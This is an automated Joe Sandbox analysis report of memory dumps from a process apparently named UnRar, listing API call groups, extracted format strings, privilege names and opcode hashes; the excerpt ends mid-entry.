                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: __vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1180542099-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID:
                                                            • API String ID: 1825529933-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LoadStringswprintf$fflush
                                                            • String ID: %12ls: $%12ls: $%12ls: %8.8X$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %u$%12ls: RAR %ls(v%d) -m%d%s$%12s: %s$%c%10ls %9ls $%ls$%ls$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$ $ %ls $ -md=$ -md=$ -md=$ -md=?$#%d$#%d$%02x%02x..%02x $%8.8X $%9ls %4ls $%cB$%d%%$%ls$%ls$%ls$%ls $%ls $%s$*<-?->$-->$1.5$5.0$<--$<->$???????? $BLAKE2$BLAKE2 MAC$CRC32$CRC32 MAC$Pack-BLAKE2$Pack-CRC32$STM$Unix$Unix owner$Windows
                                                            • API String ID: 1297088633-4266122169
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: LoadString$_invalid_parameter_noinfo_noreturnfflushswprintf
                                                            • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$%s: %s$%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$, %s$, %s$, %s$, %s$, %s$, %s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                            • API String ID: 2121331369-348187198
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: snprintf$_invalid_parameter_noinfo_noreturn
                                                            • String ID: %02u$%02u$%02u$%02u$%02u$%02u$%03u$%04u$%05u$+$.rar$YMDHISWAEN$yyyymmddhhmmss
                                                            • API String ID: 2530296757-3573682242
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandle$CreateErrorLastProcessToken$AdjustControlCurrentDeleteDeviceDirectoryLookupOpenPrivilegePrivilegesRemoveValue
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 208058286-3508440684
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 281475176-2761157908
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                            • String ID: rtmp
                                                            • API String ID: 3587137053-870060881
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LoadString$CloseConcurrency::cancel_current_taskHandlefflush
                                                            • String ID: $*.*$*.rev$.bad$rev
                                                            • API String ID: 547650108-1236369498
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocBlanketClearCreateInstanceProxyStringVariant
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 917201731-3505469590
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: $*.*$.bad$rar$rar$rev
                                                            • API String ID: 3668304517-1289673977
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesStateSuspendValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 651064505-3733053543
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1693479884-0
                                                            • Opcode ID: 7cba0b75250a928dd731a426afb9cb866d179b85efd3a25c5df1654fb9a7f7f0
                                                            • Instruction ID: cd1bcc62bb10736fc110e49eaf9487b5b8d6b69952e33c1a0caa21709675a444
                                                            • Opcode Fuzzy Hash: 7cba0b75250a928dd731a426afb9cb866d179b85efd3a25c5df1654fb9a7f7f0
                                                            • Instruction Fuzzy Hash: 69A11462F17B42D4FE40EB79C4445BDA361AB44BA4B921331DE6E17BE9DE3CD4828310
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Char$Buff
                                                            • String ID: CMT
                                                            • API String ID: 333758917-2756464174
                                                            • Opcode ID: 6b480d7e19afe1fe48c4fefa621223f97fb63c63dbad2e79910f50453bf83199
                                                            • Instruction ID: 4ac05e98a42852795e0d20f0284f33df815b42b7f1c32fff5fd2481d848eb545
                                                            • Opcode Fuzzy Hash: 6b480d7e19afe1fe48c4fefa621223f97fb63c63dbad2e79910f50453bf83199
                                                            • Instruction Fuzzy Hash: 64E1E262A1A7C2C6FB20AB35C8402FDA351FB45794F860271DA5D576EAEF29E542C320
                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: 50a86863d81db5e9d0778eedc107b562812cdede2111bbcff5cf326cf6651b12
                                                            • Instruction ID: 244af170dac4cf7f5f4b8dc800a6c114cecd21d2873f8a327b7853286128ad9a
                                                            • Opcode Fuzzy Hash: 50a86863d81db5e9d0778eedc107b562812cdede2111bbcff5cf326cf6651b12
                                                            • Instruction Fuzzy Hash: 0831507260AB82C9FB609F60E8503ED7360FB84744F85443ADA9E57AA8DF38D549C710
                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 8f69d08c15f445be57c0dc53aa82e3b385f50c61c83586db0cc49fcf1a9f44ff
                                                            • Instruction ID: 475d0d1c554dde38bd5b967b6a45fe85d1625d3054cbf5bc13df9810f338e14e
                                                            • Opcode Fuzzy Hash: 8f69d08c15f445be57c0dc53aa82e3b385f50c61c83586db0cc49fcf1a9f44ff
                                                            • Instruction Fuzzy Hash: 28318232609F82D5FB649F24E8502AEB3A0FB88754F910139EA9D43BA9DF38C546C710
                                                            APIs
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID:
                                                            • API String ID: 3398352648-0
                                                            • Opcode ID: efaefda5290a5ead3fc8a25c74f0ba06e475af27e5b9894fbcee2c20c4c71834
                                                            • Instruction ID: cdea8cb0a2ee0c34d5998c2cd7ea488a9b89f437d7bf1271d242fe3c203b6995
                                                            • Opcode Fuzzy Hash: efaefda5290a5ead3fc8a25c74f0ba06e475af27e5b9894fbcee2c20c4c71834
                                                            • Instruction Fuzzy Hash: 9A112972A19B42C6F7509F21F85016EF3A4FB88B80B855176EA9E53A68CF3CD046CB50
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: cf86c9a0d9250548926b0de2de97bbb9820486d6fb4bd2887ee2b1596ab263c3
                                                            • Instruction ID: c4ee9403977d223ec9870a87d1211a490a36fbf30338c309ebd2b4a59ec43b93
                                                            • Opcode Fuzzy Hash: cf86c9a0d9250548926b0de2de97bbb9820486d6fb4bd2887ee2b1596ab263c3
                                                            • Instruction Fuzzy Hash: 7852CF22B0EB82C6FB14EB65D2513FDA361AB41784F824175CE5E177A6DE3DE846C320
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: CMT
                                                            • API String ID: 3668304517-2756464174
                                                            • Opcode ID: 6bd5f66f95193c9f8f4573ebe2f72926996b11535a4f1e2021e21d3f96d43743
                                                            • Instruction ID: 7f82fdcad1db94468658bf98599842e8b5285fe1cb6c263a0df21622cd5feea1
                                                            • Opcode Fuzzy Hash: 6bd5f66f95193c9f8f4573ebe2f72926996b11535a4f1e2021e21d3f96d43743
                                                            • Instruction Fuzzy Hash: 19921F72A0A785C6FB14EB34D4401EEE7A1EB54384F86027ADA9F436E6DE7DE446C310
                                                            APIs
                                                            Similarity
                                                            • API ID: CreateFile$CloseControlDeviceHandle_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3376050231-0
                                                            • Opcode ID: d9cbe4070f6598d3ebf89eb2a6f6c5bbe48a2532f08795f04fb166d967cb4104
                                                            • Instruction ID: 0029d2305aba6dfba86b7b94ea236b718588c36bcc0c4768d63ca26dea697f69
                                                            • Opcode Fuzzy Hash: d9cbe4070f6598d3ebf89eb2a6f6c5bbe48a2532f08795f04fb166d967cb4104
                                                            • Instruction Fuzzy Hash: 6941A162B19B41C5FB109F64E4806ADB760FB887B4F511234DEAD23AE9EF3CD0868714
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-829830573
                                                            • Opcode ID: cd89441fa3eb589556af5d595975f25f409c1e3a849090506161f857c8688743
                                                            • Instruction ID: 6eab2f80a4d1b667b1b1a875d98487bfc4bfc71cbc9986f44e8c42820b683935
                                                            • Opcode Fuzzy Hash: cd89441fa3eb589556af5d595975f25f409c1e3a849090506161f857c8688743
                                                            • Instruction Fuzzy Hash: 07020163B0A782D5FF40AB64D4602FCA7A1EB44B94F824076CE5D577A5EF38E846C320
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFF674
                                                              • Part of subcall function 00007FF7AACF6434: GetCurrentProcess.KERNEL32(00007FF7AAD00C35), ref: 00007FF7AACF6461
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *?$.
                                                            • API String ID: 2518042432-3972193922
                                                            • Opcode ID: 5f375e6a86d94cd3e2c285c9f9dff9fd0d09093de012fa8eb1df6469ea8f9302
                                                            • Instruction ID: 5371470ecd901bf1a92e6e7c961854b06f8fbed6cbd1cdcac32129fd30b80aa4
                                                            • Opcode Fuzzy Hash: 5f375e6a86d94cd3e2c285c9f9dff9fd0d09093de012fa8eb1df6469ea8f9302
                                                            • Instruction Fuzzy Hash: 3151E267B16B96C1FB10EF6198200ACA7A0FB48BD8B864536DE5D17BA5DE3CD043C360
                                                            APIs
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                            • Instruction ID: 265dd5f864db36e6061261085af2eb6b31a5eeb2e61a2ee5e09fc69b04fc0e6c
                                                            • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                            • Instruction Fuzzy Hash: 67D1D972B1A286C7EB34DF15E18466AF7A1F798744F958134CB9E53B58CA3CE842CB10
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 1a7e6ecabbbe205f99caf5d5c5841753d45d3ae4096109ee06760729a0f725c4
                                                            • Instruction ID: a4dfc988c34fa2e8024c85c0f2f41245cc2b9eb9704cdd9d51c05f113a98a946
                                                            • Opcode Fuzzy Hash: 1a7e6ecabbbe205f99caf5d5c5841753d45d3ae4096109ee06760729a0f725c4
                                                            • Instruction Fuzzy Hash: 1BB1AB73B0AA81CAFB14EB34D4513EEA361EB54344F8145BADBAE476D6DE39E406C310
                                                            APIs
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 7cf9afbecfa3e2e1ea380101aa920d9387d1fa4e8b36d214d1f1c233accb25c8
                                                            • Instruction ID: 351eca922f8341316ca0b973744d8e9e70a46c1640caa8bc885b4c4f14063530
                                                            • Opcode Fuzzy Hash: 7cf9afbecfa3e2e1ea380101aa920d9387d1fa4e8b36d214d1f1c233accb25c8
                                                            • Instruction Fuzzy Hash: 81113A72B24A41CEFB109B70E4553BE73B0F74476AF410539DA8956AA8DF3CC149CB54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID:
                                                            • API String ID: 1365068426-0
                                                            • Opcode ID: 759f128db16c5b60ba6440f41eb12b9c26a107790f12e9b38de639ab2437617c
                                                            • Instruction ID: 361d31d42eb99003dce391ae60681c8aa428c84f2f3ebc55b74ce847222a6633
                                                            • Opcode Fuzzy Hash: 759f128db16c5b60ba6440f41eb12b9c26a107790f12e9b38de639ab2437617c
                                                            • Instruction Fuzzy Hash: 2A017171A09B45D6F7509B22F44017AA2A5FB947E0F415274DABA53AE8CF3CD442C710
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 3f42f33e8dc5275532eaf6ba69b759467ed7274642d4be3dedc194579eebbddf
                                                            • Instruction ID: c817c10fcc5e91263ed206cb3e6d500207b1add4e7d5608fbeafe5517742fe40
                                                            • Opcode Fuzzy Hash: 3f42f33e8dc5275532eaf6ba69b759467ed7274642d4be3dedc194579eebbddf
                                                            • Instruction Fuzzy Hash: 04312823B1578285F720AB32D8147BDEA91EB85BE4F958235EE6C07BE5CE3CD1028340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 53a65d727baae4d4ee09e8a5384e95abe2913edeca406c6b0861453fb1fbba21
                                                            • Instruction ID: 8a8865002c6f895eebafe4096fa69d0156390d2fbb092d095ad68350e461da7b
                                                            • Opcode Fuzzy Hash: 53a65d727baae4d4ee09e8a5384e95abe2913edeca406c6b0861453fb1fbba21
                                                            • Instruction Fuzzy Hash: 86B14873601B84CAEB15CF29C8453687BB0F744B48F55C975DAAE837A8CB39D452C710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeSpace_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2170103895-0
                                                            • Opcode ID: c8975dbc402fe788990fa28aab437df0892c563c5fc34a269a7ebd0ccbbdeeb9
                                                            • Instruction ID: d1d0ca16e6a3f726208dbf62bc6b7881811cdf295c778025234797673483b86d
                                                            • Opcode Fuzzy Hash: c8975dbc402fe788990fa28aab437df0892c563c5fc34a269a7ebd0ccbbdeeb9
                                                            • Instruction Fuzzy Hash: 1C218D22F15A42C9FB00EFB5D8802AC73B0AB04798F951535DA6D57AA9DF38D582C314
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $%s%s
                                                            • API String ID: 0-4212163154
                                                            • Opcode ID: f00eef5581a6edf15c3fdb1ad8b02ea908420898eb5fa867c687423160b13c1f
                                                            • Instruction ID: 2707dd4640ed20c99bfcda0783459ee6a49c5371ca34cacc66caecf3f4a18a45
                                                            • Opcode Fuzzy Hash: f00eef5581a6edf15c3fdb1ad8b02ea908420898eb5fa867c687423160b13c1f
                                                            • Instruction Fuzzy Hash: 84516E22B0AA42D5FB10FF61D4512FCA361EF94744FC250B6DA0E579AADE2DE50BC360
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \033'
                                                            • API String ID: 0-3165038308
                                                            • Opcode ID: bdc4d91ceb2a539a0fe2c1dce2336e13b78a5d1b49f7866399f02e7f166df3eb
                                                            • Instruction ID: caccb6b2ee982cd977ea1c83708e921150bafb1d5215ca243b356faa85ec3451
                                                            • Opcode Fuzzy Hash: bdc4d91ceb2a539a0fe2c1dce2336e13b78a5d1b49f7866399f02e7f166df3eb
                                                            • Instruction Fuzzy Hash: D2627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                            APIs
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA0AB
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA0BE
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA11E
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA127
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACC8C94
                                                              • Part of subcall function 00007FF7AACCBC5C: MoveFileW.KERNEL32 ref: 00007FF7AACCBC99
                                                              • Part of subcall function 00007FF7AACCBC5C: MoveFileW.KERNEL32 ref: 00007FF7AACCBD10
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 34527147-0
                                                            • Opcode ID: c9b7d347201d604a9d357f8e741d7c58e392641335ca02e971255211994ced22
                                                            • Instruction ID: 43260b69b42326ab7ed5d3a8604cf022ae212b90bb32e8fca217eef40f62b0f5
                                                            • Opcode Fuzzy Hash: c9b7d347201d604a9d357f8e741d7c58e392641335ca02e971255211994ced22
                                                            • Instruction Fuzzy Hash: 1C91B222B1A642C2FA50EF62D4542BEA361FB44BC4F826072EE4D57BA5DE3CD647C310
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
